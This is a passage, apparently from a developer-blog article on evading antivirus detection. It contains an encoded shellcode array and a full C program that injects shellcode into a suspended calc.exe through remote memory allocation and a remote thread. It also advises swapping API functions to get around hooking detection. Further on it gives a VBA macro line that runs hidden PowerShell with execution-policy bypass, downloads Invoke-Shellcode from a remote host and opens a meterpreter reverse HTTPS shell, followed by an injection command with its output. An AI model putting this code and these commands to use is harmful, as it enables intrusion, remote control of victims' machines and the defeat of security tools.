        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x2b\x0f\xef\xf0\x62\x17\xec\x3d\x3c\xac\xc6\xca\xbf\x64\x17&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x32\x13\x49\x98\xc1\x6d\x8d\x1e\x3a\x18\xe7\x5d\xc7\x1b\x3c&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x1c\x13\xa9\xa7\x86\xd0\x09\x0c\x37\x34\xcf\xc7\x3b\xf1\x9b&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x80\x5f\x04\x4f\xbb\x5b\x8d\x6e\x6c\xea\xd5\x54\xa8\xb7\x8e&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\xf5\xe9\x1d\x60\x09\xe9\xfe\xdd\xaf\x61\x12\x09\xc2\x2b\x7a&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\xfe\xef\xd3\x7a\x68\x67\xa7\x48\x37\xd3\x2f\xe0\xb0\xfd\xa8&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x71\xd6\xfd\x67\x39\xb7\x03\x88\x39\x91\xc7\xdc\x69\x89\xee&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x5c\xe2\x49\x0e\x89\x9e\x43\x98\xf2\xf6\xfa\xdc\x9b\x04\x03&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\xcc\x07\x81\xe5\xbe\xe7\xc1\xb9\x7e\x58\xa1\x69\x17\xb2\x2e&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x55\x07\xbd\xe5\xfe\xa2\x52\x53\x56\x5b\xca\xfe\x2c\xfa\x13&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\xd5\x48\x3c\x9f\xdf\xad\xf3\x68\xaa\xbd\xe4\x0e\x54\x3e\xf5&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\xba\x54\x54\xf1\x6c\x03\xc0\xfb\x49\x63\x4f\x03\xbc\xf0\x88&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\xfb\x41\xc0\xe3\xca\xd7\x6c\x9c\x32\x38\x6c\x5c\x65\x52\x6c&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x34\xd1\x06\x3f\x21\x1e\x93\x2c\xfa\x8b\x1c\x04\xae\x1c\x75&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\xaa\x89\x6b\xda\x55\xfc\xef\x1d\xa9\x82\xc7\x85\xc1\x7c\x58&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x36\x11\x17\x58\x66\x79\xec\x77\x89\x49\x0d\x52\xc2\xc1\x84&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x33\xa0\x70\x98\x19\x64\x2c\x99\xae\xbd\xdf\xe0\xdf\x42\x20&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x15\xf6\x26\x21\x15\xf6\x58\x1e\xc3\xcf\x2e\x61\xd7\x6b\x20&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\xd4\x7a\xdd\xab\x16\x28\x1d\xfe&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;


    &lt;span class="n"&gt;BOOL&lt;/span&gt; &lt;span class="nf"&gt;injection&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="kt"&gt;wchar_t&lt;/span&gt; &lt;span class="n"&gt;Cappname&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;MAX_PATH&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="p"&gt;};&lt;/span&gt;
        &lt;span class="n"&gt;STARTUPINFO&lt;/span&gt; &lt;span class="n"&gt;si&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;PROCESS_INFORMATION&lt;/span&gt; &lt;span class="n"&gt;pi&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;LPVOID&lt;/span&gt; &lt;span class="n"&gt;lpMalwareBaseAddr&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;LPVOID&lt;/span&gt; &lt;span class="n"&gt;lpnewVictimBaseAddr&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;HANDLE&lt;/span&gt; &lt;span class="n"&gt;hThread&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;DWORD&lt;/span&gt; &lt;span class="n"&gt;dwExitCode&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;BOOL&lt;/span&gt; &lt;span class="n"&gt;bRet&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;FALSE&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

        &lt;span class="n"&gt;lpMalwareBaseAddr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

        &lt;span class="n"&gt;GetSystemDirectory&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;Cappname&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;MAX_PATH&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;_tcscat&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;Cappname&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;L"&lt;/span&gt;&lt;span class="se"&gt;\\&lt;/span&gt;&lt;span class="s"&gt;calc.exe"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Injection program Name:%S&lt;/span&gt;&lt;span class="se"&gt;\r\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;Cappname&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

        &lt;span class="n"&gt;ZeroMemory&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;si&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;si&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
        &lt;span class="n"&gt;si&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;cb&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;si&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;ZeroMemory&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pi&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pi&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;

        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;CreateProcess&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;Cappname&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;FALSE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;CREATE_SUSPENDED&lt;/span&gt;
            &lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;si&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pi&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;bRet&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;

        &lt;span class="n"&gt;lpnewVictimBaseAddr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;VirtualAllocEx&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pi&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hProcess&lt;/span&gt;
            &lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;MEM_COMMIT&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="n"&gt;MEM_RESERVE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;PAGE_EXECUTE_READWRITE&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;lpnewVictimBaseAddr&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;bRet&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;

        &lt;span class="n"&gt;WriteProcessMemory&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pi&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hProcess&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;lpnewVictimBaseAddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;LPVOID&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;lpMalwareBaseAddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

        &lt;span class="n"&gt;hThread&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;CreateRemoteThread&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pi&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hProcess&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;LPTHREAD_START_ROUTINE&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;lpnewVictimBaseAddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

        &lt;span class="n"&gt;WaitForSingleObject&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pi&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hThread&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;INFINITE&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;GetExitCodeProcess&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pi&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hProcess&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;dwExitCode&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;TerminateProcess&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pi&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hProcess&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;bRet&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;help&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;char&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;proc&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"%s:[-] start a process and injection shellcode to memory&lt;/span&gt;&lt;span class="se"&gt;\r\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;proc&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[])&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;help&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
        &lt;span class="n"&gt;injection&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Ft7e1yz82iur8jxg9dnef.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Ft7e1yz82iur8jxg9dnef.png" alt="*Figure 19: Process injection code compilation" width="800" height="389"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;*Figure 19: Process injection code compilation
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fpi0ydrr4t4cyqw19cwcp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fpi0ydrr4t4cyqw19cwcp.png" alt="Figure 20: Process injection execution" width="799" height="219"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 20: Process injection execution
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fzt9kww4yanr0x5rpvxe6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fzt9kww4yanr0x5rpvxe6.png" alt="Figure 21: Detection results for process injection" width="800" height="267"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 21: Detection results for process injection
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;I shall conclude the injection examples here. Consider the question: how can one circumvent API hooking detection? Function substitution offers one approach. For instance, among the Win32 APIs, there exist numerous alternatives to &lt;code&gt;VirtualAlloc&lt;/code&gt; that can be employed:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fmqwq3se7dnjblw7oyxkb.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fmqwq3se7dnjblw7oyxkb.png" alt="Figure 22: Alternative memory allocation functions" width="799" height="464"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 22: Alternative memory allocation functions
  &lt;p&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  0x03 Technique Combinations
&lt;/h2&gt;

&lt;p&gt;We have discussed various techniques, encompassing the &lt;strong&gt;separation&lt;/strong&gt; approach (loaders executing shellcode, &lt;strong&gt;whitelist exploitation&lt;/strong&gt; for malicious execution), as well as &lt;strong&gt;shellcode encoding, encryption, and injection&lt;/strong&gt;. Each technique individually contributes to evasion to some degree; however, employing any single technique in isolation often presents certain &lt;strong&gt;limitations&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;The key consideration is &lt;strong&gt;combining&lt;/strong&gt; these techniques to achieve optimal results.&lt;/p&gt;

&lt;p&gt;Here is a particularly effective example:&lt;/p&gt;

&lt;h4&gt;
  
  
  Powershell-Payload-Excel-Delivery
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://github.com/enigma0x3/Powershell-Payload-Excel-Delivery/" rel="noopener noreferrer"&gt;https://github.com/enigma0x3/Powershell-Payload-Excel-Delivery/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This technique employs &lt;strong&gt;shellcode&lt;/strong&gt; to invoke Graeber's &lt;strong&gt;VBA macro&lt;/strong&gt;, which executes &lt;strong&gt;PowerShell&lt;/strong&gt; (optionally encoded) in memory to achieve persistent backdoor access.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Set objProcess = GetObject("winmgmts:\\" &amp;amp; strComputer &amp;amp; "\root\cimv2:Win32_Process")
        objProcess.Create "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('http://192.168.1.127/Invoke-Shellcode')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.127 -Lport 1111 -Force", Null, objConfig, intProcessID
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fz3aihxkjwpa2xk3tdmc3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fz3aihxkjwpa2xk3tdmc3.png" alt="Figure 23: PowerShell payload delivery via Excel" width="799" height="291"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 23: PowerShell payload delivery via Excel
  &lt;p&gt;&lt;/p&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="n"&gt;C:\PS&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Start-Process&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;C:\Windows\SysWOW64\notepad.exe&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-WindowStyle&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Hidden&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;C:\PS&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nv"&gt;$Proc&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;Get-Process&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;notepad&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;C:\PS&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Invoke-Shellcode&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-ProcessId&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nv"&gt;$Proc&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Id&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-Payload&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;windows/meterpreter/reverse_https&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-Lhost&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;192.168.30.129&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-Lport&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;443&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-Verbose&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="n"&gt;VERBOSE:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Requesting&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;meterpreter&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;payload&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;from&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;https://192.168.30.129:443/INITM&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;VERBOSE:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Injecting&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;shellcode&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;into&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;PID:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;4004&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;VERBOSE:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Injecting&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;into&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;a&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Wow64&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;process.&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;VERBOSE:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Using&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;32-bit&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;shellcode.&lt;/span&gt;&lt;span class="w"&gt;
